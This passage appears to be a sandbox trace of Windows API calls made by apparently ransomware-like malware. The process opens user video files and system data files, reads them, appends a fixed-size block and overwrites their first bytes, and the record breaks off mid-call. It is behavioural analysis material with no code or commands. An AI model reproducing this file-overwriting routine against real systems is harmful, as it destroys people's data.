[0180.041] ReadFile (in: hFile=0x1dc, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.041] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x6528 [0180.041] WriteFile (in: hFile=0x1dc, lpBuffer=0x289db38*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x289db38*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.042] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0180.042] WriteFile (in: hFile=0x1dc, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0180.042] CloseHandle (hObject=0x1dc) returned 1 [0180.042] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.043] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.043] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1f8 [0180.043] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.043] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.043] ReleaseMutex (hMutex=0x168) returned 1 [0180.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0180.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7356c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0180.044] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1f8, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x331f2bc*=0x1f8, lpOverlapped=0x0) returned 1 [0180.045] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0180.045] WriteFile (in: hFile=0x1dc, lpBuffer=0x2878b08*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2878b08*, lpNumberOfBytesWritten=0x331f2d0*=0x780, lpOverlapped=0x0) returned 1 [0180.045] CloseHandle (hObject=0x1dc) returned 1 [0180.045] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iFq7qSEHvHQN WmzmOe\\EoH7mBquEvOKApaV8\\FHnriB3AfRs-bjT5tWzg\\CzXI5f4hAk0oYx.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ifq7qsehvhqn wmzmoe\\eoh7mbquevokapav8\\fhnrib3afrs-bjt5twzg\\czxi5f4hak0oyx.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.046] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.046] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x5e17 [0180.046] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.046] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.047] ReleaseMutex (hMutex=0x168) returned 1 [0180.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CzXI5f4hAk0oYx.mkv", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0180.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CzXI5f4hAk0oYx.mkv", cchWideChar=18, lpMultiByteStr=0x1f88c44, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CzXI5f4hAk0oYx.mkv", lpUsedDefaultChar=0x0) returned 18 [0180.047] ReadFile (in: hFile=0x1dc, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.048] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x4e17 [0180.048] ReadFile (in: hFile=0x1dc, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.048] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x4e17 [0180.048] WriteFile (in: hFile=0x1dc, lpBuffer=0x289db38*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x289db38*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.049] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0180.050] WriteFile (in: hFile=0x1dc, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0180.050] CloseHandle (hObject=0x1dc) returned 1 [0180.050] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iFq7qSEHvHQN WmzmOe\\_ZlYUd2JJwlU_wHf\\6k_kMCFbM.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ifq7qsehvhqn wmzmoe\\_zlyud2jjwlu_whf\\6k_kmcfbm.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.051] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.051] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x12847 [0180.051] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.051] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.051] ReleaseMutex (hMutex=0x168) returned 1 [0180.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="6k_kMCFbM.mp4", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0180.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="6k_kMCFbM.mp4", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="6k_kMCFbM.mp4", lpUsedDefaultChar=0x0) returned 13 [0180.051] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0180.053] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x11847 [0180.054] ReadFile (in: hFile=0x1dc, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.054] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x11847 [0180.054] WriteFile (in: hFile=0x1dc, lpBuffer=0x289db38*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x289db38*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.054] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0180.054] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.055] CloseHandle (hObject=0x1dc) returned 1 [0180.055] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iFq7qSEHvHQN WmzmOe\\_ZlYUd2JJwlU_wHf\\vuifTep-4o6j41\\lC3cW5x6upIpu.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ifq7qsehvhqn wmzmoe\\_zlyud2jjwlu_whf\\vuiftep-4o6j41\\lc3cw5x6upipu.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.056] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.056] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x180b3 [0180.056] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.056] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.056] ReleaseMutex (hMutex=0x168) returned 1 [0180.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lC3cW5x6upIpu.flv", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0180.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lC3cW5x6upIpu.flv", cchWideChar=17, lpMultiByteStr=0x1f88c44, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lC3cW5x6upIpu.flv", lpUsedDefaultChar=0x0) returned 17 [0180.056] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0180.057] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x170b3 [0180.058] ReadFile (in: hFile=0x1dc, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.058] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x170b3 [0180.058] WriteFile (in: hFile=0x1dc, lpBuffer=0x289db38*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x289db38*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.058] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0180.058] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.059] CloseHandle (hObject=0x1dc) returned 1 [0180.059] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sqbgHDamn\\NLQ5FWWDBNj1dyJBF0f.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\sqbghdamn\\nlq5fwwdbnj1dyjbf0f.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.059] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.059] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1670e [0180.060] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.060] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.060] ReleaseMutex (hMutex=0x168) returned 1 [0180.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NLQ5FWWDBNj1dyJBF0f.swf", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0180.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NLQ5FWWDBNj1dyJBF0f.swf", cchWideChar=23, lpMultiByteStr=0x1f88c44, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NLQ5FWWDBNj1dyJBF0f.swf", lpUsedDefaultChar=0x0) returned 23 [0180.060] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0180.061] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1570e [0180.061] ReadFile (in: hFile=0x1dc, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.062] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1570e [0180.062] WriteFile (in: hFile=0x1dc, lpBuffer=0x289db38*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x289db38*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.062] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0180.062] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.062] CloseHandle (hObject=0x1dc) returned 1 [0180.063] CreateFileW (lpFileName="C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.063] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.063] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x109d588 [0180.063] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.063] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.063] ReleaseMutex (hMutex=0x168) returned 1 [0180.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdbeRdrUpd10116_MUI.msp", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0180.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdbeRdrUpd10116_MUI.msp", cchWideChar=23, lpMultiByteStr=0x1f88c44, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdbeRdrUpd10116_MUI.msp", lpUsedDefaultChar=0x0) returned 23 [0180.064] ReadFile (in: hFile=0x1dc, lpBuffer=0x2878ae8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2878ae8*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0180.064] ReadFile (in: hFile=0x1dc, lpBuffer=0x2878ae8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2878ae8*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0180.064] ReadFile (in: hFile=0x1dc, lpBuffer=0x2878ae8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2878ae8*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0180.065] ReadFile (in: hFile=0x1dc, lpBuffer=0x2878ae8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2878ae8*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0180.065] ReadFile (in: hFile=0x1dc, lpBuffer=0x2878ae8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2878ae8*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0180.065] ReadFile (in: hFile=0x1dc, lpBuffer=0x2878ae8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2878ae8*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0180.066] ReadFile (in: hFile=0x1dc, lpBuffer=0x2878ae8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2878ae8*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0180.066] ReadFile (in: hFile=0x1dc, lpBuffer=0x2878ae8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2878ae8*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0180.067] VirtualAlloc (lpAddress=0x0, dwSize=0x90000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ed80000 [0180.343] ReadFile (in: hFile=0x1dc, lpBuffer=0x2878ae8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2878ae8*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0180.344] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x109b588 [0180.345] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x331f278*=0x2000, lpOverlapped=0x0) returned 1 [0180.345] VirtualFree (lpAddress=0x7ed80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.346] CloseHandle (hObject=0x1dc) returned 1 [0180.346] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.347] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", lpFilePart=0x331f690*="device.png") returned 0x62 [0180.347] GetLastError () returned 0x5 [0180.347] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱Ḻ꧰Ƿ\x01") returned 0x13 [0180.347] LocalFree (hMem=0x69e2b0) returned 0x0 [0180.347] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0180.347] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0180.347] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0180.348] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0180.348] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png")) returned 0x20 [0180.349] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr1.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.351] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.351] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x400000 [0180.351] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.351] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.352] ReleaseMutex (hMutex=0x168) returned 1 [0180.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qmgr1.dat", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0180.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qmgr1.dat", cchWideChar=9, lpMultiByteStr=0x1f7342c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qmgr1.dat", lpUsedDefaultChar=0x0) returned 9 [0180.352] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: 